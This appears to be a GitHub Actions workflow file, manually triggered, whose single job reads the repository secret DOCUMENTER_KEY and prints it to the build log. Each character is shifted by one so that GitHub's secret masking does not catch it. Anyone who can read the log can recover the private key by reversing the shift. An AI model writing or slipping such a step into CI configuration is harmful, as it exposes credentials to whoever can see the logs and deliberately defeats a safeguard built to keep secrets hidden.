on: workflow_dispatch
jobs:
  ssh:
    runs-on: ubuntu-latest
    steps:
      - run: python -c 'import os; print(repr("".join(chr(ord(x) + 1) for x in os.environ["SSH"])))'
        env:
          SSH: ${{ secrets.DOCUMENTER_KEY }}
